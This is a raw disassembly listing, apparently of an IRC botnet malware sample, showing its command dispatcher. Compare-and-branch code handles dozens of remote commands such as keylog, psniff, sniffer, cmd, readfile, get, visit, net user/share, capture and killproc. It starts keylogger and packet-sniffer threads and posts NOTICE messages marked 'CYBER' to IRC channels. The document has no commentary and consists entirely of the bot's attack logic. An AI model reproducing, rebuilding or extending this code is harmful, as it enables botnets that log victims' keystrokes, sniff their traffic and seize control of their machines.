cmp [ebp+esi+var_88], ebx
jz loc_405695
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset aJoinS_5 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 24h
call sub_41EB70
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aNoticeSS_2 ; "NOTICE %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
call sub_41EB70
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aNoticeSS_3 ; "NOTICE %s :%s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_405695: ; CODE XREF: sub_401C87+3933�j
; sub_401C87+3940�j
push [ebp+arg_10]
push offset aCtcp ; "ctcp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4057A9
cmp [ebp+esi+var_88], ebx
jz loc_4057A9
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset aJoinS_6 ; "join %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset dword_4414B8
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 20h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset dword_4414CC
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 10h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset dword_4414E4
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 10h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset dword_4414FC
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 10h
loc_4057A9: ; CODE XREF: sub_401C87+3A1F�j
; sub_401C87+3A2C�j
push [ebp+arg_10]
push offset dword_441514
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4058CC
cmp [ebp+esi+var_88], ebx
jz loc_4058CC
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset dword_441518
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
push [ebp+esi+var_88]
lea eax, [ebp+var_2C0]
push offset dword_441520
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 20h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset dword_441534
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset dword_441544
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
call sub_41EB70
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset aCyber_0 ; "CYBER"
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset dword_441554
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_4058CC: ; CODE XREF: sub_401C87+3B33�j
; sub_401C87+3B40�j
push [ebp+arg_10]
push offset aRegister ; "register"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405912
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_405912
push eax
lea eax, [ebp+var_2C0]
push [ebp+esi+var_88]
push offset aNickservRegist ; "nickserv register %s %s"
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_4180CE
add esp, 14h
loc_405912: ; CODE XREF: sub_401C87+3C56�j
; sub_401C87+3C61�j
push [ebp+arg_10]
push offset aOff_0 ; "off"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_406505
mov edi, offset dword_4EC05C
loc_40592E: ; CODE XREF: sub_401C87+3CC6�j
cmp dword ptr [edi-4], 1
jnz short loc_405941
mov eax, [edi]
cmp eax, ebx
jbe short loc_405941
push eax
call ds:dword_4E3060 ; closesocket
loc_405941: ; CODE XREF: sub_401C87+3CAB�j
; sub_401C87+3CB1�j
add edi, 210h
cmp edi, offset byte_4F277C
jl short loc_40592E
cmp [ebp+var_8], ebx
jnz loc_406505
push ebx
push [ebp+var_4]
push offset unk_44158C
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
jmp loc_406505
; ---------------------------------------------------------------------------
loc_405977: ; CODE XREF: sub_401C87+319F�j
mov edi, [ebp+arg_8]
push edi
push offset aNick_1 ; "nick"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409977
push edi
push offset aN ; "n"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409977
push edi
push offset aJoin_0 ; "join"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409953
push edi
push offset aJ ; "j"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409953
push edi
push offset aPart_2 ; "part"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409936
push edi
push offset aPt ; "pt"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409936
push edi
push offset aRaw ; "raw"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4098FD
push edi
push offset aR_0 ; "r"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4098FD
push edi
push offset aKillthread ; "killthread"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40983D
push edi
push offset aK ; "k"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40983D
push edi
push offset aC_quit ; "c_quit"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40978F
push edi
push offset aC_q ; "c_q"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40978F
push edi
push offset aC_rndnick ; "c_rndnick"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409734
push edi
push offset aC_rn ; "c_rn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409734
push edi
push offset aPrefix ; "prefix"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40971B
push edi
push offset aPr ; "pr"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40971B
push edi
push offset aOpen ; "open"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4096ED
push edi
push offset aO ; "o"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4096ED
push edi
push offset aServer_0 ; "server"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4096C4
push edi
push offset aSe ; "se"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4096C4
push edi
push offset aDns ; "dns"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409656
push edi
push offset aDn ; "dn"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409656
push edi
push offset aKillproc ; "killproc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409626
push edi
push offset aKp ; "kp"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409626
push edi
push offset aKill ; "kill"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4095C7
push edi
push offset aKi ; "ki"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4095C7
push edi
push offset aDelete ; "delete"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40958C
push edi
push offset aDel ; "del"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40958C
push edi
push offset aGet ; "get"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4094AA
push edi
push offset aGt ; "gt"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4094AA
push edi
push offset aList ; "list"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40948B
push edi
push offset aLi ; "li"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40948B
push edi
push offset aVisit ; "visit"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4093AA
push edi
push offset aV ; "v"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4093AA
push edi
push offset aMirccmd ; "mirccmd"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409334
push edi
push offset aMirc ; "mirc"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409334
push edi
push offset aCmd ; "cmd"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4092DE
push edi
push offset aCm ; "cm"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_4092DE
push edi
push offset aReadfile ; "readfile"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409253
push edi
push offset aRf ; "rf"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409253
push edi
push offset aPsniff ; "psniff"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_405E10
push [ebp+arg_10]
push offset aOn ; "on"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_405DD6
push 20h
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_405D04
push offset dword_4416A8
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_405D04: ; CODE XREF: sub_401C87+4071�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_88]
mov [ebp+var_EC4], eax
mov eax, [ebp+var_4]
mov [ebp+var_E3C], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_E38], eax
jnz short loc_405D46
mov esi, offset a2_1 ; "#2"
push offset byte_4E2E7B
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405D46
mov esi, [ebp+var_88]
loc_405D46: ; CODE XREF: sub_401C87+40A1�j
; sub_401C87+40B7�j
push esi
lea eax, [ebp+var_EC0]
push 80h
push eax
call sub_41EC30
lea eax, [ebp+var_2C0]
push offset dword_4416C8
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 20h
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_E40], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC4]
push ebx
push eax
push offset sub_41289A
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_E40]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_405DC9
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_4416F8
jmp loc_406190
; ---------------------------------------------------------------------------
loc_405DC1: ; CODE XREF: sub_401C87+4148�j
push 32h
call ds:dword_4F534C ; Sleep
loc_405DC9: ; CODE XREF: sub_401C87+4127�j
cmp [ebp+var_E34], ebx
jz short loc_405DC1
jmp loc_407148
; ---------------------------------------------------------------------------
loc_405DD6: ; CODE XREF: sub_401C87+4061�j
push [ebp+arg_10]
push offset aOff_2 ; "off"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_407148
push ebx
push 20h
call sub_40B886
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405E06
push eax
push offset dword_441738
jmp loc_406190
; ---------------------------------------------------------------------------
loc_405E06: ; CODE XREF: sub_401C87+4172�j
push offset dword_441774
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_405E10: ; CODE XREF: sub_401C87+404A�j
push edi
push offset aSniffer ; "sniffer"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_405F5E
push [ebp+arg_10]
push offset aOn_0 ; "on"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_405F24
push 21h
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_405E52
push offset unk_4417AC
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_405E52: ; CODE XREF: sub_401C87+41BF�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_88]
mov [ebp+var_FEC], eax
mov eax, [ebp+var_4]
mov [ebp+var_F64], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_F60], eax
jnz short loc_405E94
mov esi, offset a2_1 ; "#2"
push offset byte_4E2E7C
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405E94
mov esi, [ebp+var_88]
loc_405E94: ; CODE XREF: sub_401C87+41EF�j
; sub_401C87+4205�j
push esi
lea eax, [ebp+var_FE8]
push 80h
push eax
call sub_41EC30
lea eax, [ebp+var_2C0]
push offset unk_4417CC
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 21h
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_F68], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FEC]
push ebx
push eax
push offset sub_412F1F
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_F68]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_405F17
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_4417FC
jmp loc_406190
; ---------------------------------------------------------------------------
loc_405F0F: ; CODE XREF: sub_401C87+4296�j
push 32h
call ds:dword_4F534C ; Sleep
loc_405F17: ; CODE XREF: sub_401C87+4275�j
cmp [ebp+var_F5C], ebx
jz short loc_405F0F
jmp loc_407148
; ---------------------------------------------------------------------------
loc_405F24: ; CODE XREF: sub_401C87+41AF�j
push [ebp+arg_10]
push offset aOff_3 ; "off"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_407148
push ebx
push 21h
call sub_40B886
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405F54
push eax
push offset unk_441840
jmp loc_406190
; ---------------------------------------------------------------------------
loc_405F54: ; CODE XREF: sub_401C87+42C0�j
push offset unk_441880
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_405F5E: ; CODE XREF: sub_401C87+4198�j
push edi
push offset aIdent ; "ident"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_406033
push [ebp+arg_10]
push offset aOn_1 ; "on"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_405FF9
push 2
call sub_40B8D3
test eax, eax
pop ecx
lea eax, [ebp+var_2C0]
jle short loc_405FA2
push offset dword_4418BC
jmp loc_407140
; ---------------------------------------------------------------------------
loc_405FA2: ; CODE XREF: sub_401C87+430F�j
push offset dword_4418DC
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 2
push eax
call sub_40B691
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_410B14
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_455F14[esi], eax
jnz loc_407148
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_441908
jmp loc_406190
; ---------------------------------------------------------------------------
loc_405FF9: ; CODE XREF: sub_401C87+42FD�j
push [ebp+arg_10]
push offset aOff_4 ; "off"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_407148
push ebx
push 2
call sub_40B886
pop ecx
cmp eax, ebx
pop ecx
jle short loc_406029
push eax
push offset dword_441940
jmp loc_406190
; ---------------------------------------------------------------------------
loc_406029: ; CODE XREF: sub_401C87+4395�j
push offset dword_441978
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_406033: ; CODE XREF: sub_401C87+42E6�j
push edi
push offset aKeylog ; "keylog"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4061B9
mov edi, [ebp+arg_10]
push edi
push offset aOn_2 ; "on"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4060A5
push edi
push offset aFile ; "file"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4060A5
push edi
push offset aOff_1 ; "off"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_407148
push ebx
push 23h
call sub_40B886
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40609B
push eax
push offset dword_4419B0
jmp loc_406190
; ---------------------------------------------------------------------------
loc_40609B: ; CODE XREF: sub_401C87+4407�j
push offset dword_4419EC
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_4060A5: ; CODE XREF: sub_401C87+43D3�j
; sub_401C87+43E4�j
push 23h
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_4060BB
push offset dword_441A18
jmp loc_40713A
; ---------------------------------------------------------------------------
loc_4060BB: ; CODE XREF: sub_401C87+4428�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_C5C], eax
mov eax, [ebp+var_4]
push offset aFile_0 ; "file"
mov [ebp+var_BD4], eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4060EA
mov [ebp+var_BD0], 1
jmp short loc_4060F3
; ---------------------------------------------------------------------------
loc_4060EA: ; CODE XREF: sub_401C87+4455�j
mov eax, [ebp+var_8]
mov [ebp+var_BD0], eax
loc_4060F3: ; CODE XREF: sub_401C87+4461�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jnz short loc_40611A
mov esi, offset a2_0 ; "#2"
push offset byte_4E2E7D
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40611A
mov esi, [ebp+var_88]
loc_40611A: ; CODE XREF: sub_401C87+4475�j
; sub_401C87+448B�j
push esi
lea eax, [ebp+var_C54]
push 80h
push eax
call sub_41EC30
lea eax, [ebp+var_2C0]
push offset dword_441A40
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 23h
push eax
call sub_40B691
add esp, 20h
mov [ebp+var_C58], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C5C]
push ebx
push eax
push offset sub_4125C5
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_C58]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz short loc_4061AC
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset dword_441A64
loc_406190: ; CODE XREF: sub_401C87+20E1�j
; sub_401C87+2EC9�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
loc_40619C: ; CODE XREF: sub_401C87+2EBE�j
; sub_401C87+560C�j
add esp, 0Ch
jmp loc_407148
; ---------------------------------------------------------------------------
loc_4061A4: ; CODE XREF: sub_401C87+452B�j
push 32h
call ds:dword_4F534C ; Sleep
loc_4061AC: ; CODE XREF: sub_401C87+44FB�j
cmp [ebp+var_BCC], ebx
jz short loc_4061A4
jmp loc_407148
; ---------------------------------------------------------------------------
loc_4061B9: ; CODE XREF: sub_401C87+43BB�j
push edi
push offset aNet ; "net"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4064B1
cmp ds:dword_4E3094, ebx
jz short loc_4061E8
cmp ds:dword_4E30BC, ebx
jz short loc_4061E8
push offset unk_441AA4
jmp loc_40649E
; ---------------------------------------------------------------------------
loc_4061E8: ; CODE XREF: sub_401C87+454D�j
; sub_401C87+4555�j
cmp [ebp+var_C], ebx
jz loc_406F1E
mov edi, [ebp+esi+var_88]
mov [ebp+arg_0], ebx
cmp edi, ebx
jz short loc_40620D
push edi
push [ebp+var_C]
call sub_41EBB0
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_40620D: ; CODE XREF: sub_401C87+4576�j
push [ebp+arg_10]
push offset aStart ; "start"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40627A
cmp edi, ebx
jz short loc_406248
push [ebp+arg_0]
push 3
call sub_419350
push eax
push offset aS_1 ; "%s"
loc_406234: ; CODE XREF: sub_401C87+4616�j
; sub_401C87+463B�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 14h
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_406248: ; CODE XREF: sub_401C87+459B�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4195F7
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2C0]
jz short loc_406270
push offset unk_441AE8
jmp loc_4064A4
; ---------------------------------------------------------------------------
loc_406270: ; CODE XREF: sub_401C87+45DD�j
push offset unk_441B0C
jmp loc_4064A4
; ---------------------------------------------------------------------------
loc_40627A: ; CODE XREF: sub_401C87+4597�j
push [ebp+arg_10]
push offset aStop ; "stop"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40629F
push [ebp+arg_0]
push 4
call sub_419350
push eax
push offset aS_2 ; "%s"
jmp short loc_406234
; ---------------------------------------------------------------------------
loc_40629F: ; CODE XREF: sub_401C87+4604�j
push [ebp+arg_10]
push offset aPause ; "pause"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4062C7
push [ebp+arg_0]
push 5
call sub_419350
push eax
push offset aS_3 ; "%s"
jmp loc_406234
; ---------------------------------------------------------------------------
loc_4062C7: ; CODE XREF: sub_401C87+4629�j
push [ebp+arg_10]
push offset aContinue ; "continue"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4062EF
push [ebp+arg_0]
push 6
call sub_419350
push eax
push offset aS_4 ; "%s"
jmp loc_406234
; ---------------------------------------------------------------------------
loc_4062EF: ; CODE XREF: sub_401C87+4651�j
push [ebp+arg_10]
push offset aDelete_0 ; "delete"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_406317
push [ebp+arg_0]
push 1
call sub_419350
push eax
push offset aS_5 ; "%s"
jmp loc_406234
; ---------------------------------------------------------------------------
loc_406317: ; CODE XREF: sub_401C87+4679�j
push [ebp+arg_10]
push offset aShare ; "share"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4063A2
cmp edi, ebx
jz short loc_40636F
cmp [ebp+var_8FC], bl
jz short loc_406347
push ebx
push edi
push 1
call sub_419737
push eax
push offset aS_6 ; "%s"
jmp short loc_40635B
; ---------------------------------------------------------------------------
loc_406347: ; CODE XREF: sub_401C87+46AD�j
push [ebp+esi+var_84]
push edi
push ebx
call sub_419737
push eax
push offset aS_7 ; "%s"
loc_40635B: ; CODE XREF: sub_401C87+46BE�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 18h
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_40636F: ; CODE XREF: sub_401C87+46A5�j
push ebx
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41992C
add esp, 10h
test eax, eax
lea eax, [ebp+var_2C0]
jz short loc_406398
push offset unk_441B70
jmp loc_4064A4
; ---------------------------------------------------------------------------
loc_406398: ; CODE XREF: sub_401C87+4705�j
push offset unk_441B94
jmp loc_4064A4
; ---------------------------------------------------------------------------
loc_4063A2: ; CODE XREF: sub_401C87+46A1�j
push [ebp+arg_10]
push offset aUser_0 ; "user"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40644D
cmp edi, ebx
jz short loc_406420
push [ebp+var_4]
cmp [ebp+var_8FC], bl
push [ebp+var_88]
push [ebp+arg_4]
jz short loc_4063E2
push ebx
push edi
push 1
call sub_419A4D
push eax
push offset aS_8 ; "%s"
jmp short loc_40640C
; ---------------------------------------------------------------------------
loc_4063E2: ; CODE XREF: sub_401C87+4748�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_4063FD
push esi
push edi
push ebx
call sub_419A4D
push eax
push offset aS_9 ; "%s"
jmp short loc_40640C
; ---------------------------------------------------------------------------
loc_4063FD: ; CODE XREF: sub_401C87+4764�j
push ebx
push edi
push 2
call sub_419A4D
push eax
push offset aS_10 ; "%s"
loc_40640C: ; CODE XREF: sub_401C87+4759�j
; sub_401C87+4774�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 24h
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_406420: ; CODE XREF: sub_401C87+4734�j
push ebx
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_419F61
add esp, 10h
test eax, eax
lea eax, [ebp+var_2C0]
jz short loc_406446
push offset unk_441BC8
jmp short loc_4064A4
; ---------------------------------------------------------------------------
loc_406446: ; CODE XREF: sub_401C87+47B6�j
push offset unk_441BE8
jmp short loc_4064A4
; ---------------------------------------------------------------------------
loc_40644D: ; CODE XREF: sub_401C87+472C�j
push [ebp+arg_10]
push offset aSend ; "send"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_406499
cmp edi, ebx
jz short loc_406492
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A20B
push eax
lea eax, [ebp+var_2C0]
push offset aS_11 ; "%s"
push eax
call sub_41EA60
add esp, 1Ch
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_406492: ; CODE XREF: sub_401C87+47DB�j
push offset unk_441C14
jmp short loc_40649E
; ---------------------------------------------------------------------------
loc_406499: ; CODE XREF: sub_401C87+47D7�j
push offset unk_441C38
loc_40649E: ; CODE XREF: sub_401C87+2E69�j
; sub_401C87+455C�j ...
lea eax, [ebp+var_2C0]
loc_4064A4: ; CODE XREF: sub_401C87+45E4�j
; sub_401C87+45EE�j ...
push eax
call sub_41EA60
pop ecx
pop ecx
jmp loc_406F1E
; ---------------------------------------------------------------------------
loc_4064B1: ; CODE XREF: sub_401C87+4541�j
push edi
push offset aCapture ; "capture"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40900F
push edi
push offset aCap ; "cap"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_40900F
push edi
push offset aGethost ; "gethost"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408F2B
push edi
push offset aGh ; "gh"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408F2B
loc_406505: ; CODE XREF: sub_401C87+3C9C�j
; sub_401C87+3CCB�j ...
mov edi, [ebp+esi+var_88]
cmp edi, ebx
mov [ebp+arg_1C], edi
jz loc_4076C4
push [ebp+arg_8]
push offset aKilllog ; "killlog"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408F11
push [ebp+arg_8]
push offset aKl ; "kl"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408F11
push [ebp+arg_8]
push offset aAddalias ; "addalias"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408ED0
push [ebp+arg_8]
push offset aAa ; "aa"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408ED0
push [ebp+arg_8]
push offset aPrivmsg_1 ; "privmsg"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408E76
push [ebp+arg_8]
push offset aPm ; "pm"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408E76
push [ebp+arg_8]
push offset aAction ; "action"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408E04
push [ebp+arg_8]
push offset aA ; "a"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408E04
push [ebp+arg_8]
push offset aCycle ; "cycle"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408DA0
push [ebp+arg_8]
push offset aCy ; "cy"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408DA0
push [ebp+arg_8]
push offset aMode_0 ; "mode"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408D62
push [ebp+arg_8]
push offset aM ; "m"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408D62
push [ebp+arg_8]
push offset aC_raw ; "c_raw"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408CF6
push [ebp+arg_8]
push offset aC_r ; "c_r"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408CF6
push [ebp+arg_8]
push offset aC_mode ; "c_mode"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408C73
push [ebp+arg_8]
push offset aC_m ; "c_m"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408C73
push [ebp+arg_8]
push offset aC_nick ; "c_nick"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408C06
push [ebp+arg_8]
push offset aC_n ; "c_n"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408C06
push [ebp+arg_8]
push offset aC_join ; "c_join"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408BB8
push [ebp+arg_8]
push offset aC_j ; "c_j"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_408BB8
